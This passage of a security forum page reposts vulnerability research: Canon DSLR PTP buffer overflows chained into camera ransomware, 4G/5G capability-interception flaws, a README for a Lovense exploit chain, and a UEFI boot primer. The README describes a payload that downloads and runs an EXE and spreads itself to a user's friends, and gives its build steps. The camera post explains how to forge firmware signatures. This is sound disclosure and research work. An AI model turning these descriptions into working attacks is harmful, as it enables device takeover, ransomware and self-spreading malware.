like-uri si upvote-uri primite pe postari - proiecte publicate in forum - vechimea pe RST URL: https://www.mayday-conf.com
    1 point
  4. Oamenii acestia nu au "gandit in afara cutiei", ci "in afara sistemului solar"...
    1 point
  5. Synopsis: A simple misconfiguration can lead to Stored XSS. Link: https://medium.com/@nahoragg/chaining-cache-poisoning-to-stored-xss-b910076bda4f
    1 point
  6. Synopsis: In external and red team engagements, we often come across different forms of IP based blocking. This prevents things like password brute forcing, password spraying, API rate limiting, and other forms of IP blocking like web application firewalls (WAFs). IP blocking has always been a simple and common way of blocking potentially malicious traffic to a website. The general method of IP based blocking is to monitor for a certain type of request or behavior, and when it is found, disable access for the IP that the request or behavior came from. In this post, we walk through the need for and creation of a Burp Suite extension that we built in order to easily circumvent IP blocking. Source: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/
    1 point
  7. Say Cheese: Ransomware-ing a DSLR Camera August 11, 2019 Research by: Eyal Itkin TL;DR Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us. In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware? And the answer is: Yes. Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment. Our research shows how an attacker in close proximity (WiFi), or an attacker who already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how would you respond if attackers inject ransomware into both your computer and the camera, causing them to hold all of your pictures hostage unless you pay ransom. Below is a Video Demonstration of this attack: Technical Details Picture Transfer Protocol (PTP) Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware. Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol that was accessible only to the USB connected devices, is now also PTP/IP that is accessible to every WiFi-enabled device in close proximity. In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer got paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality for spying over a victim. In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with Ransomware is only one of many options. From an attacker’s perspective, the PTP layer looks like a great target: PTP is an unauthenticated protocol that supports dozens of different complex commands. Vulnerability in PTP can be equally exploited over USB and over WiFi. The WiFi support makes our cameras more accessible to nearby attackers. In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers: USB – For an attacker that took over your PC, and now wants to propagate into your camera. WiFi – An attacker can place a rogue WiFi access point at a tourist attraction, to infect your camera. In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files. Introducing our target We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including: Canon is the largest DSLR maker, controlling more than 50% of the market. The EOS 80D supports both USB and WiFi. Canon has an extensive “modding” community, called Magic Lantern. Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs. Attackers are profit-maximisers, they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community. Obtaining the firmware This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file in the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise. The file appears to be encrypted / compressed, as can be seen in Figure 1. Figure 1 – Byte histogram of the firmware update file. The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially be a hint of the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file. Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added costs of key management implications for the vendor. Feeling stuck, we went back to Google, and checked what the internet has to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted. Being open-source, we hoped that ML would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find the key anywhere in the internet. Yet another dead end. The next thing to check was if ML ported their software to our camera model, on the chance it contains debugging functionality that will help us dump the firmware. Although such a port has yet to be released, while reading through their forums and Wiki, we did find a breakthrough. ML developed something called Portable ROM Dumper. This is a custom firmware update file that once loaded, dumps the memory of the camera into the SD Card. Figure 2 shows a picture of the camera during a ROM dump. Figure 2 – Image taken during a ROM Dump of the EOS 80D. Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera. Reversing the PTP layer Finding the PTP layer was quite easy, due to the combination of two useful resources: The PTP layer is command-based, and every command has a unique numeric opcode. The firmware contains many indicative strings, which eases the task of reverse-engineering it. Figure 3 – PTP-related string from the firmware. Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online. When looking on the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them is very high. PTP Handler API Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context: Figure 4 – Decompiled PTP handler, using the ptp_context object. As we can see, the context contains function pointers that are used for: Querying about the size of the incoming message. Receiving the incoming message. Sending back the response after handling the message. It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands. Luckily for us, the parsing code for each command uses plain C code and is quite straight-forward to analyze. Soon enough, we found our first vulnerability. CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C PTP Command Name: SendObjectInfo PTP Command Opcode: 0x100c Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code: Figure 5 – Vulnerable code snippet from the SendObjectInfo handler. This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive that is located right after our copy. Our copy can modify the pKeywordsStringUnicode field into an arbitrary value, and later trigger a call to free it. This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit. CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9 PTP Command Name: NotifyBtStatus PTP Command Opcode: 0x91F9 Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6. Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler. Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest. CVE-2019-5999– Buffer Overflow in BLERequest – 0x914C PTP Command Name: BLERequest PTP Command Opcode: 0x914C It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7. Figure 7 – Vulnerable code snippet from the BLERequest handler. We now have 3 similar vulnerabilities: Buffer Overflow over a global structure. Buffer Overflow over the stack. Buffer Overflow over the heap. As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest. Gaining Code Execution We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon’s “EOS Utility” software, and it seems natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup. Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.” Figure 8 – Crash screen we received when we tested our exploit PoCs. Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development. Basic recap of our tools thus far: Our camera has no debugger or ML on it. The camera wasn’t opened yet, meaning we don’t have any hardware-based debugging interface. We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler. The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started. Our plan is to use the Sleep() function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep and then hang, making our breakpoint strategy quite pointless. Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing”, a hang, means we didn’t reach it. We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution. Loading Scout Scout is my goto debugger. It is an instruction-based debugger that I developed during the FAX research, and that proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we can use a file loader that will load Scout from the SD Card, we will later need the same network connectivity for Scout, so we might as well solve this issue now for them both. After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi. We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke. After intensive examination, our best guess is that the camera crashes before we return back from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera. Especially when it doesn’t even support Bluetooth. We went back to the drawing-board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of the PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities. CVE-2019-6000– Buffer Overflow in SendHostInfo – 0x91E4 PTP Command Name: SendHostInfo PTP Command Opcode: 0x91E4 Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance. Figure 9 – Vulnerable code snippet from the SendHostInfo handler. This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial. Illegal packets will only be logged, but not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊 Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command. CVE-2019-6001– Buffer Overflow in SetAdapterBatteryReport – 0x91FD PTP Command Name: SendAdapterBatteryReport PTP Command Opcode: 0x91FD Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler. Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler. In this case, the stack buffer is rather small, so we will continue using the previous vulnerability. Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection. Loading Scout – Second Attempt Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process. But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware. Time for some Crypto Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go. This reverse engineering task went much better that we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting back a malicious firmware update and then signing it so it will pass the verification checks. Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated. Using this instruction, we now know what are the correct signatures for each part in the firmware update file, effectively gaining a signing primitive by the camera itself. Since we only have one camera, this was a tricky part. We want to test our own custom home-made firmware update file, but we don’t want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM Dumper, created by patching Magic Lantern’s ROM Dumper. Figure 11 – Image of our customized ROM Dumper, using our header. CVE-2019-5995 – Silent malicious firmware update: There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file. Wrapping it up After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user. Chaining everything together requires the attacker to first set-up a rogue WiFi Access Point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect. Once the attacker is within the same LAN as the camera, he can initiate the exploit. Here is a video presentation of our exploit and ransomware. Disclosure Timeline 31 March 2019 – Vulnerabilities were reported to Canon. 14 May 2019 – Canon confirmed all of our vulnerabilities. From this point onward, both parties worked together to patch the vulnerabilities. 08 July 2019 – We verified and approved Canon’s patch. 06 August 2019 – Canon published the patch as part of an official security advisory. Canon’s Security Advisory Here are the links to the official security advisory that was published by Canon: Japanese: https://global.canon/ja/support/security/d-camera.html English: https://global.canon/en/support/security/d-camera.html We strongly recommend everyone to patch their affected cameras. Conclusion During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well. Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and wide-spread consumer audience makes cameras a lucrative target for attackers. A final note about the firmware encryption. Using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers. Sursa: https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
    1 point
  8. New vulnerabilities in 5G Security Architecture & Countermeasures (Part 1) Skrevet 8. August 2019 av Ravishankar Borgaonkar The 5G network promises to transform industries and our digital society by providing enhanced capacity, higher data rates, increased battery life for machine-type devices, higher availability and reduced power consumptions. In a way, 5G will act as a vehicle to drive much needed digital transformation race and will push the world into the information age. Also, 5G can be used to replace the existing emergency communication network infrastructures. Many countries are about to launch 5G services commercially as 5G standards have been developed by the 3GPP group, including security procedures. The following map in Figure 1 shows 5G deployments worldwide. Figure 1 : 5G deployments worldwide [1] With every generation from 2G to 5G, wireless security (over the air security between mobile phones and cellular towers) has been improving to address various threats. For example, 5G introduced additional security measures to counteract fake base station type of attacks (also known as IMSI catchers or Stingray). Thus, the privacy of mobile subscribers while using 5G networks is much better than previous generations. However, some of the wireless functionalities that existed in 4G are re-used in 5G. For example, the 3GPP standards group has designed several capabilities in 4G and 5G specifications to support a wide range of applications including smart homes, critical infrastructure, industry processes, HD media delivery, automated cars, etc. In simple words, such kind of capabilities means telling the cellular network that I am a mobile device or a car or IoT device to receive special network services. These capabilities play an essential role for the right operation of the device with respect to its application. In particular, they define the speed, frequency bands, security parameters, application-specific parameters such as telephony capabilities of the device. This allows the network to recognise the application type and accordingly offer the appropriate service. For example, an automated car indicates its Vehicle-2-Vehicle (V2V) support to the network and receives the required parameters to establish communication with surrounding vehicles. Over the last several months Dr. Ravishankar Borgaonkar together with Altaf Shaik, Shinjo Park and Prof. Jean-Pierre Seifert (SecT, TU Berlin, Germany) experimented with 5G and 4G device capabilities both in the laboratory setting and real networks. This joint study uncovers the following vulnerabilities: Vulnerabilities in 5G A protocol vulnerability in 4G and 5G specification TS 33.410 [2] and TS 33.501 [3] that allows the fake base station to steal information about the device and mount identification attacks Implementation vulnerability in cellular network operator equipment that can be exploited during a device registration phase A protocol vulnerability in the first release of LTE NB-IoT that affects the battery life of low-powered devices Potential Attacks An adversary can mount active or passive attacks by exploiting above three vulnerabilities. In active attacks, he or she can act as a man-in-the-middle attacker to alter device capabilities. Another important point is that such attacks can be carried out using low-cost hardware/software setup. As shown in Figure 2, we use about 2000 USD setup to demonstrate attack feasibility and subsequent impacts. Figure 2: Experimental setup for MiTM attack [4] In particular, we demonstrated following Man-in-the-middle (MiTM) attacks – Fingerprinting Attacks – An active adversary can intercept device capabilities and identify the type of devices on a mobile network and intellectually estimate the underlying applications. To demonstrate impact, we performed a Mobile Network Mapping (MNmap) attack which results in device type identification levels as shown in Figure 3. Downgrading Attacks – An active adversary can also alter radio capabilities to downgrade network services. For example, VoLTE calls can be denied to a particular mobile phone during the attack. Battery Drain Attacks – Starting from 4G networks, there is Power Saving Mode (PSM) defined in the specifications. All cellular devices can request the use of PSM by including a timer T3324 during the registration procedure. When PSM is in use, the 3GPP standard indicates to turn off the radio baseband of the device and thus the radio operations but however, applications on the device (or sensors) can still operate depending on the device settings. An adversary can remove the use of PSM feature from the device capability list during the registration phase, resulting in loss of battery power. In our experiment with NB-IoT device, a power drain attack reduces the battery life by a factor of 5. Figure 3: Device type identification levels [4] More detailed information about above attacks, feasibility and their impact can be found in our full paper, titled “New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities” [4]. Responsible Disclosure We discovered the vulnerabilities and attacks earlier this year. We followed responsible disclosure procedure and notified GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme. In parallel, we also notified 3GPP who is responsible for designing 4G/5G security specifications and affected mobile network operators. Research Impact & Countermeasures We suggested in [4] that 3GPP should consider mandating security protection for device capabilities. In particular, Device Capability Enquiry message carrying radio access capabilities should be accessible/requested by the eNodeB ( a base station in 4G or 5G for example) only after establishing RRC security. This will prevent a MitM attacker from hijacking those capabilities. Consequently, fixing these vulnerabilities will help in mitigating IMSI catcher or fake base station types of attacks against 5G networks. On the network operator side, eNodeB configuration or implementation should be changed such that a eNodeB should request Device Capability Information only after establishing a radio security association. This is a relatively easy fix and can be implemented by the operators either as a software update or a configurational change on their eNodeBs. Nevertheless, in practice, only a minor number of operators are acquiring capabilities after security setup. The difference among various operators we tested clearly indicates that this could be either an implementation or configuration problem. While working with GSMA through their Coordinated Vulnerability Disclosure (CVD) Programme, we received confirmation (with CVD-2019-0018 number) last week during the Device Security Group meeting in San Francisco that 3GPP SA3, a group that standardizes 5G security, has agreed to fix the vulnerabilities identified by us in [4]. Following is a snapshot of countermeasures to be added to the 4G [2] and 5G [3] specification respectively – 3GPP SA3 response to fix specification vulnerabilities Even though fixes will be implemented into 4G and 5G standards in coming months, baseband vendors need longer periods (as compared with normal Android or iOS software updates) to update their basebands and hence attackers can still exploit this vulnerability against 4G and 5G devices. A summery of our findings, potential attack, their impact and countermeasures are shown in the following table 1 [4]. In part 2, we will be publishing our work on improving 5G and 4G Authentication and Key Agreement (AKA) protocol to mitigate mobile subscriber privacy issues. Also, we outline AKA protocol related network configuration issues in deployed 4G networks worldwide. References: 5G commercial network world coverage map: 5G field testing / 5G trials / 5G research / 5G development by country (June 15, 2019) https://www.worldtimezone.com/5g.html 3GPP. 2018. 3GPP System Architecture Evolution (SAE); Security architecture. Technical Specification (TS) 33.401. 3rd Generation Partnership Project (3GPP). http://www.3gpp.org/DynaReport/33401.htm 3GPP. 2018. Security architecture and procedures for 5G System. Technical Specification (TS) 33.501. 3rd Generation Partnership Project (3GPP). http: //www.3gpp.org/DynaReport/33501.htm Altaf Shaik, Ravishankar Borgaonkar, Shinjo Park, and Jean-Pierre Seifert. 2019. New vulnerabilities in 4G and 5G cellular access network protocols: exposing device capabilities. In Proceedings of the 12th Conference on Security and Privacy in Wireless and Mobile Networks (WiSec ’19). ACM, New York, NY, USA, 221-231. DOI: https://doi.org/10.1145/3317549.3319728 Publisert i kategorien Ukategorisert med stikkordene . Sursa: https://infosec.sintef.no/en/informasjonssikkerhet/2019/08/new-vulnerabilities-in-5g-security-architecture-countermeasures/
    1 point
  9. butthax This repository contains code for an exploit chain targeting the Lovense Hush connected buttplug and associated software. This includes fully functional exploit code for a Nordic Semiconductor BLE stack vulnerability affecting all versions of SoftDevices s110, s120 and s130, as well as versions of the s132 SoftDevice 2.0 and under. Exploit details can be found in the slides for the associated DEF CON 27 talk, Adventures in smart buttplug penetration (testing). How to build I don't really expect anyone to actually build this, but if for some reason you do, follow these steps: Get armips (I used version 0.10.0) and have it in your PATH Install devkitARM Get the buttplug's SoftDevice from Nordic (s132_nrf52_1.0.0-3.alpha_softdevice.hex) and place it in the inputbin directory (or dump it from your own plug) Dump your buttplug's application firmware through SWD (for example with j-link command "savebin hushfw.bin, 1f000, 4B30") and place it as hushfw.bin in the inputbin directory Run build.bat - it should generate exploitfw.zip. You can then use the Nordic Toolbox app to enable DFU mode on the target buttplug using the "DFU;" serial command and then flash the custom firmware you just built through the app's DFU functionality NOTE: if anything goes wrong building this you could totally end up bricking your toy, or worse. So please be sure to 100% know what you're doing and don't blame me if it does mess up. Files fwmod: malicious firmware for the Hush firmwaremod.s: edits the firmware to (a) install hooks into the softdevice that will allow us to intercept raw incoming/outgoing BLE packets and (b) send our own raw BLE packets exploit source/main.c: C implementation of the Nordic SoftDevice BLE vulnerability exploit source/payload.c: binary payload to be sent to and run by the victim USB dongle inputbin: input binaries that i don't want to redistribute because i didn't make them and don't want to get in trouble (BYOB) js/t.js: JavaScript payload to run in the Lovense Remote app - downloads an EXE file, runs it, and then forwards the payload to everyone in the user's friend list s132_1003a_mod: modifications to the 1.0.0.3alpha version of the s132 SoftDevice (which is what the Hush ships with) which allow our modded firmware to interact with the BLE stack - must be built before fwmod scripts: various python scripts to help build this crap shellcode: a few assembly files for tiny code snippets used around the exploit chain - doesn't need to be built as they're already embedded in other places, only provided for reference flash.s: source for fwmod/exploit/source/payload.c, ie the payload that runs on the victim USB dongle - contains code to generate the HTML/JavaScript payload, flash it to the dongle for persistence, and then send it over to the app Contact You can follow me on twitter @smealum or email me at smealum@gmail.com. Disclaimer don't be a dick, please don't actually try to use any of this Sursa: https://github.com/smealum/butthax/blob/master/README.md
    1 point
  10. Understanding modern UEFI-based platform boot To many, the (UEFI-based) boot process is like voodoo; interesting in that it's something that most of us use extensively but is - in a technical-understanding sense - generally avoided by all but those that work in this space. In this article, I hope to present a technical overview of how modern PCs boot using UEFI (Unified Extensible Firmware Interface). I won't be mentioning every detail - honestly my knowledge in this space isn't fully comprehensive (and hence the impetus for this article-as-a-primer). Also, I can be taken to task for being loose with some terminology but the general idea is that by the end of this long read, hopefully both the reader - and myself - will be able to make some sense of it all and have more than just a vague inkling about what on earth is going on in those precious seconds before the OS comes up. This work is based on a combination of info gleaned from my own daily work as a security researcher/engineer at Microsoft, public platform vendor datasheets, UEFI documentation, some fantastic presentations by well-known security researchers + engineers operating in this space, reading source code and black-box research into the firmware on my own machines. Beyond BIOS: Developing with the Unified Extensible Firmware Interface by Vincent Zimmer et al. is a far more comprehensive resource and I'd implore you to stop reading now and go and read that for full edification (I personally paged through to find the bits interesting to me). The only original bit that you'll find below is all the stuff that I get wrong (experts; please feel free to correct me and I'll keep this post alive with errata). The code/data for most of what we're going to be discussing below resides in flash memory (usually SPI NOR). The various components are logically separated into a bunch of sections in flash, UEFI parts are in structures called Firmware Volumes (FVs). Going into the exact layout is unnecessary for what we're trying to achieve here (an overview of boot), so I've left it out. SEC SEC Genesis 1 1 In the beginning, the firmware was created. 3 And the Power Management Controller said, Let there be light: and there was light. 2 And while it was with form, darkness was indeed upon the face of the deep. And the spirit of the BIOS moved upon the face of the flash memory. 4 And SEC saw the light, that it was good: and proceeded to boot. Platform Initialization starts at power-on. The first phase in the process is called the SEC (Security) phase. Before we dive in though, let's back up for a moment. Pre-UEFI A number of components of modern computer platform design exist that would be pertinent for us to familiarize ourselves with. Contrary to the belief of some, there are numerous units capable of execution on a modern PC platform (usually presenting with disparate architectures). In days past, there were three main physically separate chips on a class motherboard - the northbridge (generally responsible for some of the perf-critical work such as the faster comms, memory controller, video), the southbridge (less-perf-critical work such as slower io, audio, various buses) and, of course, the CPU itself. On modern platforms, the northbridge has been integrated on to the CPU die (IP blocks of which are termed the 'Uncore' by Intel, 'Core' being the main CPU IP blocks) leaving the southbridge; renamed the PCH (Platform Controller Hub) by Intel - something we're just going to refer to as the 'chipset' here (to cover AMD as well). Honestly, exactly which features are on the CPU die and which on the chipset die is somewhat fluid and is prone to change generationally (in SoC-based chips both are present on the same die; 'chiplet' approaches have separate dies but share the same chip substrate, etc). Regardless, the pertinent piece of information here is that we have one unit capable of execution - the CPU that has a set of features, and another unit - the chipset that has another set of supportive features. The CPU is naturally what we want to get up and running such that we can do some meaningful work, but the chipset plays a role in getting us there - to a smaller or larger extent depending on the platform itself (and Intel + AMD take slightly different approaches here). Let's try get going again; but this time I'll attempt to lie a little less: after all, SEC is a genesis but not *the* Genesis. That honour - on Intel platforms at least - goes to a component of the chipset (PCH) called the CSME (Converged Security and Manageability Engine). A full review of the CSME is outside the scope of this work (if you're interested, please refer to Yanai Moyal & Shai Hasarfaty's BlackHat USA '19 presentation on the same), but what's relevant to us is its role in the platform boot process. On power-on, the PMC (Power Management Controller) delivers power to the CSME (incidentally, the PMC has a ROM too - software is everywhere nowadays - but we're not going to go down that rabbit hole). The CPU is stuck in reset and no execution is taking place over there. The CSME (which is powered by a tiny i486-like IP block), however, starts executing code from its ROM (which is immutably fused on to the chipset die). This ROM code acts as the Root-of-Trust for the entire platform. Its main purpose is to set up the i486 execution environment, derive platform keys, load the CSME firmware off the SPI flash, verify it (against a fused of an Intel public key) and execute it. Skipping a few steps in the initial CSME flow - eventually it gets itself to a state where it can involve itself in the main CPU boot flow (CSME Bringup phase). Firstly the CSME implements an iTPM (integrated TPM) that can be used on platforms that don't have discrete TPM chips (Intel calls this PTT - Platform Trust Technology). While the iTPM capabilities are invoked during the boot process (such as when Measured Boot is enabled), this job isn't unique to the CSME and the existence of a dTPM module would render the CSME job here moot. More importantly, is the CSME's role in the boot process itself. The level of CSME involvement in the initial stages of host CPU execution depends on what security features are enabled on the platform. In the most straightforward case (no Verified or Measured Boot - modes of Intel's Boot Guard), the CSME simply asks the PMC to bring the host CPU out of reset and boot continues with IBB (Initial Boot Block) execution as will be expounded on further below. When Boot Guard's Verified Boot mode is enabled, however, a number of steps take place to ensure that the TCB (Trusted Computing Base) can extended to the UEFI firmware; a fancy way of saying that one component will only agree to execute the next one in the chain after cryptographic verification of that component has taken place (in the case of Verified Boot's enforcement mode; if we're just speaking Measured Boot, the verification takes place and TPM PCRs are extended accordingly, but the platform is allowed to continue to boot). Let's define some terms (Clark-Wilson integrity policy) because throwing academic terms into anything makes us look smart: CDI (Constrained Data Item) - trusted data UDI (Unconstrained Data Item) - untrusted data TP (Transformation Procedure) - the procedure that will be applied to UDI to turn it into CDI; such as by certifying it with an IVP (Integrity Verification Procedure) In other words, We take a block of untrusted data (UDI) which can be code/data/config/whatever, run it through a procedure (TP) in the trusted code (CDI) such that it turns that untrusted data to trusted data; the obvious method of transformation being cryptographic verification. In other other words, trusted code verifies untrusted code and therefore that untrusted code now becomes trusted. With that in mind, the basic flow is as follows: The CSME starts execution from the reset vector of its ROM code. The ROM is assumed to be CDI from the start and hence is the Root-of-Trust The initial parts of the CSME firmware are loaded off the flash into SRAM (UDI), verified by the ROM (now becoming CDI) and executed The CPU uCode (microcode) will be loaded. This uCode is considered UDI but is verified by the CPU ROM which acts as the Root-of-Trust for the CPU Boot Guard is enabled, so the uCode will load a component called the ACM (Authenticated Code Module) (UDI) off the flash, and will, using the CPU signing key (fused into the CPU), verify it The ACM (now CDI) will request the hash of the OEM IBB signing key from the CSME. The CSME is required here as it has access to the FPF (Field Programmable Fuses) which are burned by the OEM at manufacturing time The ACM will load the IBB (UDI) and verify it using the OEM key (now CDI). The CPU knows if Boot Guard is enabled by querying the CSME FPFs for the Boot Guard policy. Astute readers will notice that there is a type of 'dual root-of-trust' going on here; rooted in both the CSME and the CPU. (Note: I've purposefully left out details of how the ACM is discovered on the flash; Firmware Interface Table, etc. as it adds further unnecessary complexity for now. I'll consider fleshing this out in the future.) The CPU now continues to boot by executing the IBB; either unverified (in no Boot Guard scenario) or verified. We are back at the other Genesis. Hold up for a moment (making forward progress is tough, isn't it??)! Let's speak about Measured Boot here for a short moment. In it's simplest configuration, this feature basically means that at every step, each component will be measured into the TPM (such that it can be attested to in the future). When Measured Boot is enabled, an interesting possible point to note here: A compromise of the CSME - in its Bringup phase - leads to a compromise of the entire TCB because an attacker controls the IBB signing keys provided to the CPU 